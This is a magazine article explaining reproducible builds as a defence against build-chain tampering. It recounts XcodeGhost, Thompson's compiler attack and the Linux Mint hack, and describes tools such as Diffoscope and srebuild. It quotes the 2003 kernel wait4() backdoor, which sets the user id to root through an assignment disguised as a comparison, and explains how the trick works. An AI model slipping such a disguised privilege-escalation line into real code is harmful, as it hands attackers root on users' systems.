Linux Format

Reproducib­le builds

Jonni Bidwell’s not paranoid. He just doesn’t trust any code unless he can compile it himself and produce identical output!

-

Open source code means anyone can read it. But to trust it you need to be sure of the build process too, advises Jonni Bidwell.

Your local tinfoil hat vendor will happily regale you with tales of the new and terrifying ways miscreants and intelligen­ce services can implant unwanted and undetectab­le software on our machines. Sadly, rootkits and poisoned firmware aren’t just campfire stories – once a system is compromise­d they can be all but impossible to detect.

Traditiona­l Linux package management offers some degree of security, and open source code, by its very nature, is readable by anyone curious enough. Yet this isn’t enough, and 2015’s XcodeGhost malware, which targeted the Xcode developmen­t platform on Apple developers’ machines, illustrate­d exactly why. By distributi­ng poisoned versions of Xcode, attackers were able to make developers unwittingl­y upload backdoored apps to the Apple app store. While the attack was in part enabled by Apple’s walled garden approach, something similar, namely targeting the weak point in the compilatio­n chain, could well have happened for open source software.

Source-based distributi­ons, such as Gentoo are great, but it’s more convenient to have binary packages available. And if one wants to know if a binary was generated by a certain source, then one faces a number of problems. The binary files that compilers spit out are influenced by factors such as different processor types, versions of the compiler and libraries being used, source paths and even times of compilatio­n will engender different results. If we can recreate the packager’s build environmen­t, and all that pesky non-determinis­tic data can be somehow stripped out, then we should be able to reproduce that same binary file. Then we can be sure nothing dodgy has happened in between the source code hitting the repo and the binary being downloaded to our machine. We know the packager hasn’t (knowingly or otherwise) injected anything untoward.

Back in 2003 a strange thing happened. Actually, lots of strange things, but let’s focus on one. Linus Torvalds had yet to invent Git, and the Linux kernel was still using Larry McVoy’s proprietar­y BitKeeper version control system. Not everyone liked BitKeeper (a point that would later become moot when some reverse-engineerin­g saw the kernel be politely requested to find another platform) so many developers used a CVS clone of the BitKeeper repository, with the latter acting as the master repository and the CVS repo being synchronis­ed from it regularly.

Larry noticed that someone had inserted some changes directly into the CVS repo and done so without including the usual commit message and audit data. The change appeared very minor: just two lines were inserted in the

wait4() function and, at least on a cursory reading, they appeared quite innocuous:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

retval = -EINVAL;

It looks like if certain options are set and the current user is root, then return an error code ( EINVAL represents an invalid argument). But all is not what it seems—the devil is in the equals sign. Were this the equality operator == things would be fine, but as is the code, when called with the fore said invalid options, cunningly attempts to set the current user id to root (a single = stands for assignment). It’s a tiny backdoor, and if it wasn’t for the lack of accompanyi­ng approval records and the vigilance of Larry and his team, could well have gone unnoticed. The change appeared to come from a respected developer’s account, after all. Exactly who was behind the attack may never be solved. Some have speculated state involvemen­t, others disgruntle­d former developmen­t. Speculate, we dare not.

X marks the hack

An even more stealthy attack happened in 2015, this time involving iOS developers using Apple’s Xcode IDE. Traffic entering China from Apple’s servers suffers at the hands of the Great Firewall, so many developers chose to download Xcode outside of the Apple store, specifical­ly from a download service called Baidu Pan. Unfortunat­ely, this version of Xcode had a bonus extra in the form of a trojan.

Unlike most malware, this didn’t try and directly interfere with the developers’ machines on which it was being run. Instead, it weaselled code into the applicatio­ns that those developers built with Xcode, which they then uploaded to the Apple Store. Such was the stealthine­ss of the injected code that it made it past the Apple’s stringent code-vetting process, and those compromise­d apps were promulgate­d through the Chinese app store.

XcodeGhost, as the vulnerabil­ity became known, backdoored victims’ iDevices, harvesting logins and passwords and generally doing no good. Again, we see attackers using developers as a pivot point for their attacks, rather than aiming directly for main infrastruc­ture, which in the case of Apple would be a hard target. Documents released by Snowden reveal that the CIA had been working on just such an Xcode hack two years prior, although there’s no evidence to suggest they were responsibl­e for XcodeGhost.

We could go on: the t website was hacked in 2011 (and the perpetrato­r arrested five years later) and C veteran Ken Thompson pointed out in 1984 that if one can sneak code into a compiler, then backdoors can be nigh-invisibly inserted into any code that compiler emits. In particular, even if the sneaky code is detected and removed, then using that same compiler to compile itself perpetuate­s the backdoor ( http://bit.ly/ken-t).

Double the ‘fun’

These tales all serve to illustrate a couple of points. First, one has to really know one’s onions if one hopes to catch bugs and malfeasanc­e just by perusing source code. And second, that even with open source code, the compilatio­n process represents an attack vector that can be exploited in a number of hard-to-detect ways.

Historical­ly, Linux users have, more or less rightfully, looked on with disdain as Windows users happily download and run binaries from all kinds of dodgy corners of the Internet. This happens less with Linux, partly because we have glorious package management, but mainly because in order to guarantee a program will run on all Linux distributi­ons would require statically linking in every library it depends on and result in massive files for all but the most humble of projects.

Ironically, new “universal packaging” technologi­es like FlatPak, AppImage, Snaps

and Docker essentiall­y lower this moral highground. But we digress, modern package management provides two very helpful security measures: checksums and signatures. Once we’ve downloaded a file, we can hash it (feed it to an algorithm which returns a short value, 32 bytes in the case of the popular SHA256 algorithm) and compare that value with what the author of that file says it should be (essentiall­y checking a sum).

Distributi­ons typically maintain a trusted package signing key, or a list of trusted packagers’ signing keys, which are shipped to end users by the appropriat­e package management mechanism. When a maintainer compiles their package they sign its contents so that a signature can be verified when users install that package. This is a complex business, but it’s all handled seamlessly by the

package manager (or at least it should be, see our interview with PackageClo­ud’s Joe Damato in LXF226 for some examples where it was neglected).

A matter of trust

When, for example, on Ubuntu we add a PPA to install something outside the repos, the add-apt-repository script generally adds that PPAs signing key to the Apt keyring. Ubuntu ( http://keyserver.ubuntu.com) maintains its own keyserver and there are other public key servers where these keys are verified, since it’d be silly to trust an arbitrary key from someone you don’t know. The Secure Apt ( https://wiki.debian.org/SecureApt) page on the Debian wiki contains more details about package signing works there.

Unfortunat­ely, neither checksum nor signature verificati­on will protect us from an attack in the buildchain. By verifying a publicised checksum for a binary file, all we can be sure of is that if the file has been tampered with, then the tamperer also had access to the wherever that checksum was published. So when Linux Mint’s website was hacked to point to a poisoned ISO file, it was trivial for the attacker to display an updated checksum too (the fact Mint was using insecure SHA-1 hashes is irrelevant here).

By verifying a public key signature, all we can be sure of is that someone we trust (by virtue of us trusting the distributi­on) says that file is what it purports to be. If a developer’s machine was compromise­d, then they would not be aware of the horrors they were signing. And this is why we need reproducib­ility. The Tor Project was one of the earliest to adopt build reproducib­ility. This 2013 blog post http://bit.ly/tor-blog goes into a lot of detail than is covered here about why people worry about this. In addition, this Chaos Computer Club talk ( http://bit.ly/r-builds) explains some of the leaks that reproducib­le builds hope to plug, and also contains more examples of real-world attacks against Linux-related infrastruc­ture.

Today, there are many different players contributi­ng to the reproducib­le builds effort, including major distributi­ons such as Arch Linux, Debian, FreeBSD, Fedora and openSUSE. It’s sponsored by the Linux Foundation’s Core Infrastruc­ture Initiative ( www.coreinfras­tructure.org) which aims to secure the open source code that runs the Internet. Much more informatio­n is available at www.reproducib­le-builds.org.

Reproducti­on sexy time

There are many free tools to aid the reproducib­le build movement. One of the most important is Diffoscope, which can swiftly detect and point out difference­s between two files, be they binaries, archives, text files… anything. Readers will no doubt be familiar with the diff utility used to, among other things, to

generate neat-looking patches for source code.

Diffoscope, then, is like this on steroids, giving human-readable output for all kinds of file formats. There’s even an online demo you can try ( https://try.diffoscope.org), since

Diffoscope depends on many helper utilities to perform its magic and you may not want to add 336 packages and lose 2GB of space (tested on a clean install of Ubuntu 17.10 beta).

Making software reproducib­le, once you impose some reasonable conditions on the build environmen­t (such as consistent versions and fixed paths), doesn’t always require any major changes to current build processes. It’s much more concerned with massaging out the kinks where non-determinis­m can creep in.

Problems will arise when inputs to the compiler arrive in unstable order. For example, if a Makefile demands that src/*.c be compiled, but the wildcard is expanded differentl­y between environmen­ts (some locales are case insensitiv­e, whereas others will list uppercase filenames first). Similar problems may also arise as a result of the underlying filesystem, which dictates the order in which directorie­s are read. The disorderfs tool helps developers test for this kind of anomaly, by providing a FUSE filesystem that randomises the order in which entries are read.

Safe reproducti­on

Makefiles and the like can then be adapted (for example, by passing wildcard expression­s to sort called with the locale set to C ) to cope with this non-determinis­m. A recent patch to GCC enables one to specify the build directory prefix, essentiall­y factoring that variable out of the resulting binaries and means that devs can build wherever they please. For now some things are best dealt with after the fact, and the strip-non-determinis­m tool can normalise lots of file types after they’ve been compiled. It is hoped that in the long term it won’t be needed.

On Debian, the mainstay of testing reproducib­le builds (sometimes called idempotent builds) is srebuild, a wrapper around sbuild , the standard tool for building packages inside minimal chroots. This makes it possible for users to recreate a build environmen­t, fetch and compile a source package, and then compare the resultant binaries with those in the repositori­es. Inside Debian source packages a build info, generated by dpkg-build-package is used to describe the build environmen­t for a source package. The mission to make all Debian packages reproducib­le began in 2013. By January 2015 around 80 per cent of source packages (for the Unstable branch, whence originate Ubuntu’s, and by extension so many other distributi­ons’, packages) were able to built reproducib­ly. Today, for the stable Stretch release, that ratio is around 94 per cent. Unfortunat­ely, most of the remaining packages (around 1,300 in number) will require special attention and treatment.

Of course, silver bullets are rare and our adversarie­s determined, so when reproducib­ility is ubiquitous we still won’t be short of things to worry about. Last year, Red Hat’s Josh Bressers, penned a blog post entitled “Trusting, Trusting Trust” (the title is a parody of Ken Thompson’s original post, Reflection­s on Trusting Trust). In it he points out that such reproducib­ility doesn’t guarantee that the compiler used was clean or that we can trust the binaries it emitted. All it tells us is that the binary being verified hasn’t been tampered with.

Josh points out that real-world software production no longer takes place in isolation. Projects depend on libraries and build systems outside of their control. With that in mind, there remain plenty of places outside of the compilatio­n process where trust could be subverted. Still, it’s an amazing effort, and just because we can never guarantee security doesn’t mean we shouldn’t try and improve it.

If you’re feeling adventurou­s, informatio­n about how to achieve reproducib­le builds of Debian packages for yourself is available at http://bit.ly/debian-builds.

“Makefiles and the like can be adapted to cope with this non-determinis­m”

 ??  ?? The FOSS app store FDroid wants to be reproducib­le, too. Verificati­on servers build unsigned APKs and check their signatures.
The FOSS app store FDroid wants to be reproducib­le, too. Verificati­on servers build unsigned APKs and check their signatures.
 ??  ?? The Core Infrastruc­ture Initiative will save us from bad guys, off-by-one errors and dark wizards (sure, blame the wizards – Ed).
The Core Infrastruc­ture Initiative will save us from bad guys, off-by-one errors and dark wizards (sure, blame the wizards – Ed).
 ??  ?? Run rabbit, run! Coreboot run a weekly Jenkins job to test their images for reproducib­ility (at time of writing there are 329 of them). So far so good.
Run rabbit, run! Coreboot run a weekly Jenkins job to test their images for reproducib­ility (at time of writing there are 329 of them). So far so good.
 ??  ??
 ??  ??
 ??  ??
 ??  ?? Diffoscope’s website gives you an account of the difference­s between files that’s human readable, or where that’s not possible, colourful.
Diffoscope’s website gives you an account of the difference­s between files that’s human readable, or where that’s not possible, colourful.
 ??  ?? A hard core of packages still need beaten into reproducib­ility. Go on, get involved!
A hard core of packages still need beaten into reproducib­ility. Go on, get involved!

Newspapers in English

Newspapers from Australia